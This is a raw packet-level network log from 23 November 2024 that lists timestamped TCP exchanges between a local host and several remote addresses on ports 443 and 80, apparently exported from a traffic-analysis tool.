                                                                                                                                                                                                Nov 23, 2024 16:53:21.185233116 CET49736443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:53:22.576307058 CET49736443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:53:22.576376915 CET443497364.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:22.576433897 CET49736443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:53:22.576452971 CET443497364.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:24.747325897 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:24.747430086 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:24.747489929 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:24.747595072 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:24.747642994 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:24.755469084 CET49742443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:24.755532980 CET44349742172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:24.755628109 CET49742443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:24.755901098 CET49742443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:24.755939007 CET44349742172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:26.015870094 CET44349742172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:26.015971899 CET49742443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:26.019413948 CET49742443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:26.019449949 CET44349742172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:26.019785881 CET44349742172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:26.029058933 CET49742443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:26.029124022 CET49742443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:26.029181957 CET44349742172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:26.634871006 CET44349742172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:26.635003090 CET44349742172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:26.635180950 CET49742443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:26.635267019 CET49742443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:26.635287046 CET44349742172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:26.635298967 CET49742443192.168.2.4172.67.162.84
                                                                                                                                                                                                Nov 23, 2024 16:53:26.635307074 CET44349742172.67.162.84192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:26.636527061 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:26.762420893 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:26.762532949 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:26.766813993 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:26.886501074 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.208677053 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.208751917 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.208786964 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.208821058 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.208856106 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.208864927 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.208890915 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.208926916 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.208961010 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.208996058 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.209026098 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.209034920 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.209034920 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.209034920 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.209070921 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.328835011 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.328994989 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.329108953 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.332871914 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.381371975 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.418700933 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.418812990 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.418919086 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.421036005 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.421153069 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.421219110 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.429507017 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.429562092 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.429626942 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.438049078 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.438163042 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.438213110 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.446402073 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.446499109 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.446548939 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.454824924 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.454879999 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.454942942 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.463355064 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.463422060 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.463485003 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.471741915 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.471806049 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.471868992 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.480134010 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.480246067 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.480308056 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.488595963 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.488666058 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.488712072 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.501794100 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.501996994 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.502162933 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.506123066 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.553210020 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.630582094 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.630614996 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.630812883 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.632100105 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.632224083 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.632304907 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.637487888 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.637643099 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.637708902 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.642908096 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.642966032 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.643023968 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.648215055 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.648336887 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.648442030 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.653721094 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.653757095 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.653820992 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.658972979 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.659130096 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.659197092 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.664411068 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.664542913 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.664607048 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.669724941 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.669840097 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.669925928 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.675122023 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.675147057 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.675204039 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.680962086 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.681057930 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.681123018 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.685857058 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.686014891 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.686104059 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.691231012 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.691327095 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.691384077 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.696588039 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.696751118 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.696811914 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.701961994 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.702142000 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.702199936 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.707389116 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.707439899 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.707494974 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.712702990 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.712757111 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.712800026 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.718101025 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.718324900 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.718370914 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.723455906 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.723545074 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.723596096 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.728867054 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.728935957 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.728996038 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.734200001 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.787564039 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.841057062 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.841243029 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.841336012 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.842232943 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.842363119 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.842430115 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.846427917 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.846575975 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.846637964 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.850465059 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.850650072 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.850856066 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.854654074 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.854851961 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.854912043 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.858596087 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.858710051 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.858762026 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.862493992 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.862551928 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.862612963 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.866409063 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.866540909 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.866615057 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.870368958 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.870423079 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.870474100 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.874183893 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.874309063 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.874358892 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.878115892 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.878279924 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.878348112 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.881987095 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.882147074 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.882193089 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.885883093 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.886004925 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.886049986 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.889785051 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.889955044 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.890075922 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.893806934 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.893979073 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.894042969 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.897576094 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.897759914 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.897814035 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.901501894 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.901675940 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.901726961 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.905373096 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.905566931 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.905642033 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.909250021 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.909445047 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.909501076 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.913177013 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.913296938 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.913373947 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.917088032 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.917196035 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.917268991 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.920979023 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.921101093 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.921150923 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.924859047 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.924952984 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.925070047 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.928831100 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.928924084 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.928977013 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.932662964 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.932717085 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.932769060 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.936569929 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.936654091 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.936706066 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.940474033 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.940603018 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.940659046 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.944341898 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.944449902 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.944503069 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.948276043 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.948426008 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.948476076 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.952161074 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.952290058 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.952334881 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.956038952 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.956207037 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.956259012 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.960014105 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.960059881 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.960123062 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.964039087 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.964142084 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.964204073 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.967729092 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.968091965 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.968153000 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.971630096 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.971746922 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:28.971807003 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:28.975490093 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.022043943 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.051501989 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.051556110 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.051717997 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.052896976 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.053014040 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.053076029 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.055733919 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.055850029 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.055922031 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.058614016 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.058667898 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.058733940 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.061395884 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.061513901 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.061578989 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.064224958 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.064352036 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.064414024 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.066912889 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.067045927 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.067111969 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.069617033 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.069734097 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.069797993 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.072196007 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.072294950 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.072360992 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.074893951 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.074947119 CET8049744185.215.113.16192.168.2.4
